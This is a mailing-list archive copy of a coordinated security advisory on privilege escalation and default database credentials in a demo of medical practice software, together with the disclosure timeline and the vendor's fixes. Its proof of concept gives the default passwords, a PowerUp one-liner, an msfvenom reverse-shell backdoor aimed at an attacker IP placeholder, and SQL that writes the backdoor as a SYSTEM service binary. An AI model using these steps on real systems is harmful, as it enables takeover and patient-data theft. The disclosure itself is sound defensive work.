| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <f485ba39-f942-4e7d-89d5-ce8fd80b9aca@sec-consult.com>
Date: Wed, 4 Jun 2025 06:28:50 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20250604-0 :: Local Privilege Escalation and
Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice
management) Demo version
SEC Consult Vulnerability Lab Security Advisory < 20250604-0 >
=======================================================================
title: Local Privilege Escalation and Default Credentials
product: INDAMED - MEDICAL OFFICE (Medical practice management)
Demo version
vulnerable version: Revision 18544 (II/2024)
fixed version: Q2/2025 (Privilege Escalation, Default Password)
Q3/2025 (medoff DBA Privileges)
CVE number: -
impact: critical
homepage: https://www.indamed.de
found: 2024-05-08
by: Daniel Hirschberger (Office Bochum)
Tobias Niemann (Office Bochum)
Florian Stuhlmann (Office Bochum)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
(Translated)
"MEDICAL OFFICE is a versatile doctor's software that provides you with
excellent support in practice management. Various modules give you the
opportunity to expand MEDICAL OFFICE Professional individually. The practice
software is therefore very well suited for use in a wide variety of medical
practices, supra-local group practices, medical care centers (MVZ), therapeutic
practices and hospital outpatient departments. "
Source: https://www.indamed.de/
Business recommendation:
------------------------
The vendor clarified that only our tested demo version from their website is
affected by the identified security issues. The production environment
is hardened by their certified technicians and medical facilities are configured
in accordance with the security guidelines of the "Kassenärztliche
Bundesvereinigung (KBV)".
The vendor provides a further hardened software update as well.
SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.
Vulnerability overview/description:
-----------------------------------
1) Local Privilege Escalation (Demo version)
The installation of MEDICAL OFFICE defaults to the folder "C:\INDAMED" and
installs services which are running with "NT AUTHORITY\SYSTEM" permissions.
Attackers can replace existing services with their own malicious services to
escalate privileges to "SYSTEM".
2) Hardcoded Credentials (Demo version)
The application uses a Firebird database for statistical medical data and a
MariaDB for the core data, e.g. users, patients, patient data, etc. For both
databases default or easily guessable credentials are used. An attacker can use
this to exfiltrate data, falsify records or in combination with the previous
vulnerability, execute arbitrary code as the "SYSTEM" user by exploiting it
remotely via the network.
Proof of concept:
-----------------
1) Local Privilege Escalation (Demo version)
By default, MEDICAL OFFICE is installed in the folder "C:\INDAMED" and contains
several service binaries which are run as "SYSTEM". By renaming one of the
following services and writing a malicious service binary with the original name
of the service, an attacker can escalate privileges to "SYSTEM":
guardian.exe
moserver.exe
Example:
While the moserver.exe is running an attacker can rename the file to
moserverx.exe and drop a malicious service binary with the name moserver.exe.
Afterwards one has to restart the moserver.exe service which is not possible for
normal users. The attacker can however reboot the machine to complete the attack.
An easier variant uses the fact that dropping a service binary with the
name "guardian.new" will force the currently running guardian to stop, copy the
"guardian.new" to "guardian.exe" and then start the service.
By utilizing PowerUp's 'Write-ServiceBinary'
(https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1),
the attack can be simplified to the following oneliner:
Write-ServiceBinary -UserName secconsult -Name "MEDICAL OFFICE - Guardian" -Path C:\INDAMED\guardian.new
<privesc.png>
2) Hardcoded Credentials (Demo version)
MEDICAL OFFICE uses a Firebird database for statistical medical data which is
located at "C:\INDAMED\dat\MOSTAT242G.gdb". The Firebird server uses the default
credentials "SYSDBA:masterkey". Fortunately, the Firebird server is not
exposed by default.
The core database which contains user, patients and medical data is a MariaDB
instance which is listening on port 2020 and uses the default credentials
"medoff:medoff". The installer creates a firewall rule to allow connections to
this port.
<firewall.png>
The hardcoded credentials can be used to login in to the MariaDB with the user medoff
who has DBA rights:
<db_grants.png>
By using TEMPORARY TABLES, LOAD DATA LOCAL and SELECT INTO OUTFILE, an attacker
can write a malicious service binary to "C:\INDAMED\guardian.new". This seems to
be used during an update to restart the guardian service. As soon as a
"guardian.new" is detected the currently running guardian service stops all
processes, copies "guardian.new" to "guardian.exe" and starts the new guardian
executable with SYSTEM permissions.
The attack can be performed in two parts:
a) Create a backdoored guardian.exe
A backdoored service executable can i.e. be created with msfvenom:
--------------------------------------------------------------------------------
msfvenom -p windows/shell_reverse_tcp -o guardian.new LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -k -f exe -x guardian.exe
--------------------------------------------------------------------------------
b) Upload and save the backdoored guardian.exe to "C:\INDAMED\guardian.new":
--------------------------------------------------------------------------------
USE medoff;
CREATE TEMPORARY TABLE mytest (payload LONGBLOB);
LOAD DATA LOCAL INFILE "backdoor.exe" INTO TABLE mytest FIELDS TERMINATED BY 'doesnotexist' LINES TERMINATED by 'doesnotexist';
SELECT * FROM mytest INTO OUTFILE "C:\INDAMED\guardian.new" FIELDS TERMINATED BY 'doesnotexist' LINES TERMINATED BY 'doesnotexist';
--------------------------------------------------------------------------------
Afterwards, MEDICAL OFFICE seems to work as usual and spawns a reverse shell on
the attacker's machine:
<revshell.png>
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* Revision 18544 (II/2024) - Demo version from the vendor's website
Vendor contact timeline:
------------------------
2024-10-07: Contacting vendor through info@...amed.de
2024-10-08: Vendor responds professionally and asks for details.
Sending security advisory to vendor.
2024-10-24: Asking for a status update.
2024-10-28: Vendor CEO states that they are working on a statement
and on fixing the issues. They also ask for our client
who authorized the assessment. We respond that this was
done on our behalf as part of a research project.
2024-11-12: Asking for a status update.
2024-11-13: Vendor asks for a delay of the disclosure.
2024-11-14: We agree to delay the disclosure.
2025-01-13: Asking for a status update.
2025-01-21: Vendor responds, that local network access is necessary and
all medical facilities are required to adhere to the security guides
of the "Kassenärztliche Bundesvereinigung (KBV)".
Regarding issue 1), only certified technicians are performing
the installation and the guidelines have been verified and
updated. Future updates will optimize the installation further
and remove extended permissions.
Regarding issue 2), this only affects the demo version, only secure
passwords are used for production environments.
Future improvements include validation and adaptation/removal of access
rights of the "medoff" user. Those will be rolled out in March 2025.
2025-01-22: Thanking the vendor for the detailed response. Asking when most
customers will have the new hardened SW version to coordinate
our release.
2025-03-04: We ask for a date when the patch is done.
2025-03-12: Update Q2/25 will fix the upgrade process and ensure that
that new installations get a complex database password.
Q3/25 will then further harden the database user.
2025-03-18: We ask for coordination regarding the publication date and
offer to write a small success story.
2025-04-16: We ask for a suitable publication date.
2025-05-20: Vendor CEO tells us that we can proceed with publishing the
advisory and that he is interested in highlighting our work in a
small success story. Additionally, he thanks us for our patience and
professionalism.
2025-06-04: Coordinated release of advisory.
Solution:
---------
The vendor clarified that only our tested demo version from their website is
affected by the identified security issues. The production environment
is hardened by their certified technicians and medical facilities are configured
in accordance with the security guidelines of the "Kassenärztliche
Bundesvereinigung (KBV)".
Additionally, the vendor implemented a revised upgrade process as well as a
hardened database password.
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult
EOF Daniel Hirschberger, Tobias Niemann, Florian Stuhlmann / @2025
Download attachment "db_grants.png" of type "image/png" (81113 bytes)
Download attachment "firewall.png" of type "image/png" (4553 bytes)
Download attachment "privesc.png" of type "image/png" (35359 bytes)
Download attachment "revshell.gif" of type "image/gif" (263454 bytes)
Download attachment "revshell.png" of type "image/png" (124829 bytes)
Download attachment "smime.p7s" of type "application/pkcs7-signature" (4438 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists